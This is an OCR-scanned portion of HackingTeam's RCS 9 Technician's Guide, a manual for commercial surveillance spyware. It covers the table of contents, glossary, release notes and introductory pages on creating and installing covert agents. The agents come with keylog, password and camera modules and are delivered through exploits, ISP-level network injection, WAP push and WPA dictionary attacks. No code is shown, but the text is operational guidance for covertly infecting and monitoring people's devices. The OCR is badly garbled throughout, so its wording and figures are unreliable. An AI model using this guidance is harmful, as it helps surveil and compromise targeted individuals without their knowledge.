Position event __115 Purpose __115 Operating svstems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .115 Parameters ..116 Proeess event -. 116 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . __116 Operating svstems .. 116 Parameters .- 116 Ouota event . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .11? Purpose Operating svstems Parameters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .11? Sereensaver event .. 11? Purpose Operating svstems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .11? Parameters .11? SimChange event Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Operating svstems .. 118 Parameters .- 118 Siv'iS event . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .118 Purpose __118 Operating svstems __118 Parameters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .118 Standlov event __118 Operating svstems __118 Parameters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .118 Timer event ..119 Purpose __119 Operating svstems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .118 Parameters .119 Window event .1163! Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . __118 Operating svstems .120 Parameters .-120 WinEvent event . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .120 Purpose __120 Operating svstems .-120 Para meters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .120 Appendix: modules ..121 ver.1.5 8EP-2613 868 C?i 2613 HT8.r.l. -pag.

Module list ..122 Addressbook module .-123 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .123 Operating systems .123 Significantdata .-124 Application module . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..124 Purpose ..124 Operating systems .-124 Significantdata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..124 Calendar module ..124 Purpose ..124 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 124 Significantdata ..124 Call module ..125 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..125 Operating systems ..125 Significantdata .-125 Camera module . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .125 Purpose ..125 Operating systems .-125 Significantdata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..126 Cnat module ..126 Purpose ..126 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 126 Significantdata ..126 Clipboard module ..126 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..126 Operating systems ..126 Significantdata Conference module . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .12? Purpose .122 Operating systems Significantdata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .12? Crisis module .122 Behayior on desktop deyices .12? Behayior on mobile deyices .12? Operating systems .128 Significant desktop data -126 Significant mobile data .128 Oeyice module .129 Teclmician'stiuicle yer.1.5 5E P-2CI13 RC5 9 261332] -pag. ix

Purpose .129 Operating systems .129 Significant mobile data .. 129 File module .129 Purpose .129 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 129 Signifieantdata ..129 Infection module .130 Keylog module . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .130 Purpose .130 Operating systems .130 5ignifieantdata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .131 Liyemie module ..131 Purpose .131 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 131 Signifieantdata ..131 Messages module -131 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .131 Operating systems .. 132 5ignifieantdata .132 l?y?lie module . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .132 Purpose .132 Platforms -132 5ignifieantdata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .133 Mouse module .133 Purpose .133 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..134 Signifieantdata ..134 Password module -.134 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .134 Operating systems .. 134 5ignifieantdata .134 Position module . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..134 Purpose .134 Operating systems .134 Significant mobile data ..135 Sereensnot module ..135 Purpose .135 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 135 Signifieantdata ..135 yer.1.5 5EP-2013 RC5 C?i 2013 HT5.r.l. -pag.

Url module .136 Purpose .136 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .136 Significantdata .136 Appendix: installation vectors .13? List of installation yectors .138 Operating systems supported by agents .138 What you should know about Android -139 Root priyileges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .139 Obtaining a Code Signing certificate .. 139 Introduction .139 Installing the Code Signing certificate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .140 Exploit yector {desktop} .140 Purpose .140 Installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .140 Deleting no longer used files .. 140 Operating systems .- 140 Para meters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 140 Melted Application yector .. 141 Purpose .141 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .141 Para meters .141 Network Injection yector .-141 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .141 Operating systems .. 142 Parameters .-142 Offline Installation yector .142 Purpose .142 Operating systems .- 142 Para meters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .142 Silent Installer yector .143 Purpose .143 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 143 Para meters .143 U3 Installation yector -. 144 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .144 Operating systems .144 Parameters .-144 Exploit yector {mobile.144 Purpose .144 Teclmician'stiuicle yer.1.S SE P-2013 RES 20139:] -pag. KI

Installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .144 Deleting no longer used files .144 Example of installer copy command on the deyice . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .145 Parameters .145 Installation Package yector . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .145 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145 Notes for Android operating systems {yector preparation} -145 Notes for Android operating systems {installation.145 Notes for Windows Phone operating systems {yector preparation.146 Notes for Windows Phone operating systems {installation} .146 Notes for Windows Mobile operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14? Notes for BlackBerry operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .142 Notes for Symbian operating systems .148 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .148 Android, iO5, WinNiobile, Windows Phone parameters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .148 8 ack8erry settings -. 148 5ymbian settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148 Local Installation yector . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .149 Purpose .149 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .149 Para meters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 149 OR CodefWeb Link yector .149 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._149 Operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .149 Deleting no longer used files .150 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .150 Para meters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .150 WAP Push Message yector Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .150 Operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .151 Installation .151 Deleting no longer used files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 151 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .151 Parameters .151 Installation Package preparation for 5ym bian . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .152 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .152 Recommended sequence -.152 Obtain the Editor ID {you.153 Creating Certificate Public and Priyate keys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .153 Technician'stiiuitle yer.1.5 RES 9 2CI18EI HT5.r.l. - pag. XII

Creating the Development Certificate ..153 Installation Package preparation for Windows Phone ?1551r Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1551r Recommended sequence How to read these instructions __155 Obtaining a Symantec ID code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 155 Obtaining a Symantec certificate ..156 Installing the Symantec certificate Generate the .pr and .aetx files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._158 Load the .pfx and .aetx files on the RC5 database server .159 uer.1.5 SEP-ECIB RC5 2-3 2013i? HT5.r.l. -pag. Kill

Riff} - Glossary lossa ry The terms and their definitions used in this manual are provided below. A Accounting Console section that manages RC8 access. acquisition sequence Group of complex events. actions and acquisition modules that make up the advanced agent con?guration. Administrator The person who enables user access to the system. creates work groups and de?nes operations. targets and the type ofdata to be collected. Agent Software probes installed on devices to monitor. They are designed to collect evidence and communicate it to the Collector. alert rules Rules that create alerts when new evidence is stored or agents communicate back for the ?rst time. Alerting Console section that manages new evidence alerts. alerting group Group ofusers who receive notifications via mail whenever a system alarm is trig- gered {for example. when the database exceeds available free space limits}. Nor- mally this group is not linked to an operation. Analyst Person in charge of analyzing the data collected during operations. Anonymizer {optional} Protects the server against external attacks and permits anonymity during investigations. Transfers agent data to Collectors. Tethnieian Guide ver.1.5 SE Fit-1'5 I Riff}? Ell-131;: - peg. xiv

Riff} - Glossary Audit Console section that reports all users' and system actions. Used to monitor abuse of RCS. back end Environment designed to and save collected information. In distributed archi- tecture. it includes Master Node and Shard databases. ERAS {Broadband Remote Access Server} routes traf?c toffrom DSLAM to the ISP network and provides authentication to the ISP subscribers. BSSID {Basic Service Set lDenti?er} Access Point and its client identifier. Collector Receives data sent by agents directly or through the Anonymizer chain. console Computer on which the RCS Console is installed. It directly accesses the RCS Server or Master Node. Dashboard Console section used by the Analyst. Used to have a quick overview of the status of the most important operations. targets and agents. DSLAM {Digital Subscriber Line Access Multiplexer} network device. often located in the tel- ephone exchanges of the telecommunications operators. It connects multiple cus- tomer digital subscriber line interfaces to a high-speed digital communications channel using multiplexing techniques. Tethnitian Guide ver.1.5 I Riff} Lit-131.2: HT - pa 3. xv

C-ZI - Glossary entity Group ofintelligence information linked to the target and people and places involved in the investigation. ESSID {Extended Service Set lDenti?er} Known as SSID. identi?es the network. evidence Collected data evidence. The format depends on the type of evidence image}. evidence alerts Alerts. usually in the form of emails. sent to when new evidence matches the set rule. factory A template for agent con?guration and compiling. front end Environment designed to communicate with agents to collect information and set their con?gurations. In distributed architecture. it includes the Collector and Network Controller. injection rules Settings that de?ne how to identify HTTP traf?c. what resource should be injected and what method is to be used for the injection. Monitor Console section that monitors components and license status. TeLhniLian Guide ver.1.5 SE Fill-1'5 I Ruff}? - peg. xvi

Ruff} C-ZI - Eilossarv Network Controller Component that checks Network Injector and Anonymizer status and sends them new configurations and software updates. Network Injector Hardware component that monitors the target's network traffic and injects an agent into selected Web resources. It comes in two versions. Appliance or Tactical: the former is for deployment at the ISP. the latter for use on the field. Network Injector Appliance Rackable version of the Network Injector. for installation at ISP. See: Tactical Net- work Injector. 0 operation Investigation aimed at one or more targets. whose devices will be recipients for agents. RC3 em ote Control System I the product documented hereto. RC3 Console Software designed to interact with the RCS Server. RC3 3erver One or more computers. based on the installation architecture. were essential RCS components are installed: Shard databases. Network Controllers and Collector. 33H {Secure a network protocol for secure data communication. remote shell serv- ices or command execution. TeLhniLian s-?Eiuide ver.1.5 I Fair} Eli-131.2: HT - peg. xvii

G) - Glossary System Console section that manages the system. System administrator The person who installs the servers and consoles. updates software and restores data in case offaults. Tactical Network Injector The portable version ofNetwork Injector. for tactical use. See: Network Injector Appliance. TAP {Test Access Port} a hardware device installed in a network that passively monitors the transmitted data flow. target The physical person under investigation. Technician The person assigned by the Administrator to create and manage agents. UPS {Virtual Private Server} a remote server where the Anonymizer is installed. Com- monly available for rent. WPA {Wi Fi Protected Access} WiFi network protection. WPA 2 {Wi Fi Protected Access} WiFi network protection. TethniL'ian Guide ver.1.5 I HT - pa g.

Guide introduction resentatio Manual goals This manual is a guide for the Technician on how to use the RC5 Console to: . create agents and install them on a target defined by the Administrator . create HTTP connection injection rules for Network Injectors Information on how to consult the manual is provided below. Content This section includes the following topics: New guide features 2 Supplieddocumentation 3 Print 4 Print concepts for format 4 Product 5 Technicians l:Eiuitle uer.1.5 SEP?ll?l's - RES 9 - 2013i? HT S.r.l. - pag. 1

RC5 9 - New guide features New guide features List of release notes and updates to this online help. Reiease Code Software Description a'ate version. 30 sep. Technician's 9 Added Windows Phone platform, see instaiiation tember Guide Package vector" on page 145 2013 1.5 SE P- Updated documentation to manage root privileges for 2013 Android devices, see "What you snouid know about Android" on page 139 . Updated Network Injector management documentation, see "The Network injector" on page 65 . Updated documentation due to improvements to the user interface. Improved the contents. 3 Julv Technician's 34 The chance to test network connections, select an 2013 Guide additional dictionary to attack a WPA or WPA 2 protected 1.4 JUL- 2013 network and display installed rules were added on Tactical Control Center. Network signal power is now always visible. See What you snouid know about Tacticai ControlI Center" on page 80. A public IP address can be mapped on a private IP address set on the network interface and installed rules viewed on Appliance Control Center. See "What you shouid know about Appiiance Control' Center" on page ?5 . Removed the rule and added INJECT- HTML-FILE and rules. See "injection ruie data" on page Deleted the Applet 1It?lieb vector and deprecated the Infection odule. Added note to Uninstall action on Android. See "Uninstaii action? on page 110 . For Android, the limit of root privileges necessary for Chat, Messages and Screenshot modules has been extended to all operating system versions. See "Chat moduie" on page 126 "Messages moduie? on page 131 Technician's Guide ver.1.5 SEP-2013 RC3 9 2013 - pag. 2

RC5 9 - Supplied documentation Reiease Code Software Description date version. 15 March Technician's 33 Changed Tactical Control Center use. See Tacticai 2013 Guide Controi Center on page 34 . 1.3 MAR- Changed Appliance Control Center use. See "Appiiance 2013 Controi Center on page Added possibility of creating a factory on the operation level. See "Operation page" on page 24 . Changed Installation Package and Melted application vectors see "List of instaiiation vectors" on page 133 . Added possibility of disabling screenshot evidence in the scout agent. See "What you shouid know about agents on page 39 . Added license management to exclude file upload and command execution on the target device. See "Transferring fiies to/from a target" on page 46 . 15 Technician's 32 Added basic or advanced configuration save as template. October Guide See "What you shouid know about basic configuration" on 2012 12 OCT page 50 and See "What you shouid know about advanced 2012 configuration on page 56. Added quick investigation creation wizard. See "Wizards in the homepage" on page 13 Added scout agent management. See "What you shouid know about agents" on page 39 . 301mg 1.1 JUN g_1 Added agent functions see "Agent page" on page 41 . 2012 2012 Added Idle event see "idie event" on page 115 . Te?hmmanl5 Changed installation for Exploit, WAP push and QR Code GU'de vectors. Changed vectors Offline Installation, Installation 1.1 JUN Package see "List of instaiiation vectors" on page 138. 2012 Changed Symbian certi?cation process see "instaiiation Package preparation for Symbian" on page 152 . Code Signing certificate for Melted Application and Silent Installer vectors see "Obtaining a Code Signing certificate" on page 139 . 16 April Technician's 30 First publication 2012 Guide Supplied documentation 1.0 APR- 2012 The following manuals are supplied with RCS software: Technician's Guide ver.1.5 SEP-2013 RC3 9 2013 - pag. 3

RC5 9 - Print concepts for notes Manaai Addressees Code Distribution for- mat svstem Administrator's System System Administrator?s Guide administrator Guide PDF 1.4 559-2013 Administrator's Guide Administrators Administrator?s Guide PDF 1.4 559-2013 Technician's Guide {this Technicians Technician?s Guide PDF manual} 1.5 SEP-2013 Alt'G'd Ait?GPDF Print concepts for notes Notes foreseen in this document are listed below (Microsoft Manual of Style): 1.4 SEP-2013 I I I WARNING: indicates a riskvr situation which, if not avoided, could cause user injurvr or equipment damages. CAUTION: indicates a risky situation which, if not avoided, can cause data to be iost. neglected. IMPORTANT: offers the indications required to complete the task. While notes can be neglected and do not in?uence task completion, important indications should not be NOTE: neutral and positive information that emphasize or add information to the main text. They provide information that can onlv be applied in special cases. Tip: suggestion for the application of techniques and procedures described in the text according to special needs. It may suggest an alternative method and is not essential to text comprehension. Service caii: the operation may oniv he compieted with the heip of technicai service. Print concepts for format A key to print concepts is provided below: Technician's Guide ver.1.5 SEP-ZOIB RC8 9 20130:] - pag. ?1

RCS 9 - Product and guide addressees Description Exampie Styie See "User data? itaiic Select one of the listed servers Click Add. bold Select the File menu,Save data. Press ENTER UPPER CASE See: Network - Injector Appliance. this indicates a chapter, section, sub-section, paragraph, table or illustration heading in this manual or other publication of reference. indicates text that must be specified by the user according to a certain syntax. In the example is a date and could be "1407i2011?". indicates the object specified in the text that appears in the adjacent image. indicates text on the operator interface, a graphic element table, tab) or screen button display). indicates the name of keyboard keys. suggests you compare the definition of a word in the glossary or content with another word or content. Product and guide addressees Following is the list of professionals that interact with RCS. Addressee Activity System Follows the HackingTeam's instructions provided during the Expert administrator contract phase. Installs and updates RCS servers, Network network Injectors and RCS Consoles. Schedules and manages backups. technician Restores backups if servers are replaced. WARNING: the system administrator must have the required necessary skills. The HackingTeam is not liable for equipment malfunctions or damages due to unprofessional installation. Administrator Creates authorized accounts and groups. Creates operations and investigation target. Monitors system and license status. manager Technician Creates and sets up agents. Sets Network Injector rules Tapping speciaiist technician Analyst Analyzes and exports evidence. Operative Technician's Guide ver.1.5 SEP-ZDIB RCS 9 2013 - pag. 5

RES - Software author identi?cation data Software author identification data HT via della Moscow, 13 20121 Milano Italy TEL: 39 02 29 060 603 Fax: 39 02 63 118 946 e-mail: inf0@hackingteam.c0m ~.ier.1.5 RES 9 2013 El HT S.r.l. - pag. 6

RCS (Remote Control System) resentatio Introduction RCS {Remote Control System} is a solution that supports investigations by actively and passively tapping data and information from the devices targeted by the investigations. In fact, RCS anonymously creates, sets and installs software agents that collect data and information, sending the results to the central database to be and saved. Content This section includes the follovving topics: Differences between RCS 3.0 and RC5 15 versions Technician's l:Eiuitle ver.1.5 - RC3 C?i - 2011MB HT S.r.l. - pag. 7

RC5 C?i - [Differences between RC5 8.0 and RC5 7.6 versions Differences between RCS 8.0 and RCS 7.6 versions Differences with the RC5 7.6 version are described below Glossary RC5 v. 7.6 RC5 3.6 and higher Activity Operation Agent Module Anonymizer chain Backdoor Backdoor Class Collection Node Injection Proxy Appliance Log Repository Mobile Collection Node Anonymizing chain Agent Factory Collector Network Injector Appliance Master Node and additional Shard Collector Anonymizer Infection vector glossary for desktop RC5 v. 7.6 RC5 3.6 and higher EXE Melted application CD Offline Installation USB Offline Installation EXPL Exploit Infection vector glossary for mobile RC5 v. 7.6 RC5 3.6 and higher SD Local Installation CAB Installation Package APP Exploit ver.1.5 RC3 C?i 2011MB HT - pag. 8

RC8 9 - Infection vector glossary for mobile RC5 v. 7.6 RC5 3.0 and higher SIS Installation Package, Sw?n bian COD APK Installation Package WAP Push Message Technician's Guide uer.1.5 SEP-ECIB RC3 2CI13ICI - pag. 9

RCS Console for the Technician resentatio The Technician?s role The Technician's role is to: . create injection rules for each installed Network Injector . create infection agents for the various target devices . keep agent software updated Technician enabled functions To complete hisr?her activities, the Technician has access to the following functions: . Operation . Svstem Content This section includes the following topics: Starting the RC5 Console 11 Homepagedescription Wizardsin thehomepage Shared interface elements and actions __14 Technician procedures ver.1.5 SEP-ll?l?s - RES - 20131:] - pag. 10

RCS 9 - Starling the RC5 Console Starting the RC5 Console When started, RCS Console asks you to enter your credentials previously set by the Administrator. What the login page looks like This is what the login page looks like: an: El an Console 9J1 UH:er fit": Area Description 1 Title bar with command buttons: ii Close RCS Console. El Expand window button. El Shrink window button. 2 Login dialog window. Open RC5 Con sole To open RCS Console functions: Step Action 1 In Username and Password, enter the credentials as assigned by the Administrator. 2 In Server, enter the name of the machine or seryer address to connect to. Technician's Guide yer.1.5 RCSQ 20136:) - pag. 11

RC5 9 - Homepage description Step Action 3 6 Click the homepage appears with the menus enabled according to your account privileges. See "Homepage description?beiow . Homepage description - click? To View the homepage: Introduction The homepage is displayed when the RC5 Console is started, and is the same for all users. Enabled menus depend on the privileges assigned to the account. What it looks like This is what the homepage looks like, with recently opened items saved. For details on shared elements and actions: ?lm tut-1:6: ?crtla'mcr El ?pv.1r'rr< Tolig'h?uro Tinsl'l'ntr: .- 1.. Tl leaml Globu- '1 Recentl'bems IE- a - {3 a :i"ml Iu'mrnur Ii "x .- xx . I ?lti'w- Area Description 1 Title bar with command buttons. 2 RC5 menu with functions enabled for the user. 3 Search box to search operations, targets, agents and entities, by name or description. Technician's Guide 1uer.1.5 20133) - pag. 12

RC5 9 - Wizards in the homepage Areo Description 4 Links to the last five elements opened (operation in the Operations section, operation in the Intelligence section, target, agent and entity). Wizard buttons. Logged in user with possibility of changing the language and password. Download area with ability to View progress during export or compiling. noun-sin Current date and time with possibility of changing the time zone. Wizards in the homepage - click?? To View the homepage: Introduction For users with certain privileges, RCS Console displays buttons that run wizards. What it looks like This is how the homepage is displayed with enabled wizards: El Timid-nth: Go to '1 Recentl'bems -?a::?1u:l:m:i1:lc:l -- - :3 -- .. ?lti'w- awn-rm it'd-r. ?7 'J13'l: Technician's Guide 1uer.1.5 201343} - pag. 13

RC5 9 - Investigation Wizard Button Function gr mam" NOTE: the button is only enabled for users with Administrator and Technician privileges. Open the wizard to quickly create an agent. Winn-l Open the wizard to quickly save operation and target data. NOTE: the button is only enabled for users with Administrator and System Administrator privileges. Investigation Wizard This wizard quickly creates an agent. The wizard asks you to enter the name and type of agent to be created (desktop or mobile) and creates, in the following order: 1. a operation 2. a target 3. a factory 4. a user group in which the current user is the sole member and directly opens the factory configuration page. See "Basic factory or agent configuration? on page 50 Other elements can be added to this operation, target or user group by simply using the detail page. Shared interface elements and actions Each program page uses shared elements and allows similar actions to be run. For easier manual comprehension, elements and actions shared by some functions are described in this chapter. What the RC5 Console looks like This is what a typical RES Console page looks like. A target page is displayed in this example: Technician's Guide ver.1.5 RCSQ 201313 - pag. 14

